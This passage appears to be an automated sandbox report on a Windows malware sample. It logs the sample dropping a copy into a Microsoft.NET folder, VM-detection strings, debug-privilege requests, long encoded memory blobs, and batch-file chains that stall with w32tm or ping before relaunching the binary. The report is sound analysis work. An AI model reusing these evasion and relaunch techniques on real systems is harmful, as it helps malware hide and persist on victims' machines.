Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior

Source: JPOyDhPFIytu.exe, 00000033.00000002.2731562840.0000000012C03000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: eEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: JPOyDhPFIytu.exe, 0000000D.00000002.1763080386.000000001B50B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_
Source: JPOyDhPFIytu.exe, 00000028.00000002.2220166346.000000001B698000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: JPOyDhPFIytu.exe, 0000001E.00000002.2066031775.000000001BB3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: JPOyDhPFIytu.exe, 00000033.00000002.2735341246.000000001B584000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_SATA
Source: w32tm.exe, 00000011.00000002.1801177190.0000020F2B458000.00000004.00000020.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 0000001E.00000002.2066031775.000000001BA80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
Source: JPOyDhPFIytu.exe, 00000033.00000002.2731562840.0000000012E68000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: w32tm.exe, 00000027.00000002.2165747598.00000295E6127000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
Source: JPOyDhPFIytu.exe, 00000023.00000002.2145156994.000000001AE20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
Source: JPOyDhPFIytu.exe, 00000033.00000002.2735341246.000000001B4E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
Source: JPOyDhPFIytu.exe, 0000002D.00000002.2517847675.000000001B7F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
Source: w32tm.exe, 00000022.00000002.2088366144.000002511724A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: JPOyDhPFIytu.exe, 00000033.00000002.2700888300.0000000002D8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 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
Source: JPOyDhPFIytu.exe, 00000033.00000002.2731562840.0000000012DCB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 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","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: w32tm.exe, 00000006.00000002.1585148020.00000203A9A07000.00000004.00000020.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000007.00000002.1625194309.000000001AF30000.00000004.00000020.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 0000000D.00000002.1763080386.000000001B440000.00000004.00000020.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000012.00000002.1841756933.000000001B550000.00000004.00000020.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000019.00000002.1973360041.000000001B5F0000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000001D.00000002.2002562625.0000018DE7959000.00000004.00000020.00020000.00000000.sdmp, JPOyDhPFIytu.exe, 00000028.00000002.2220166346.000000001B5D0000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000002C.00000002.2243437280.0000022664368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9eKXf9oU9J.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\77a9gOcAJB.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tOMWzubzd4.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6C8kMSA4ag.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\mzBmoeLRKc.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\F0qtrCuOKA.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uw07fWAZe6.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9VsmEYMPZS.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\mpHYiEZ4vY.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\riciCmDgnt.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Queries volume information: C:\Users\user\Desktop\yQrCGtNgsf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Queries volume information: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Queries volume information: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Queries volume information: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe VolumeInformation
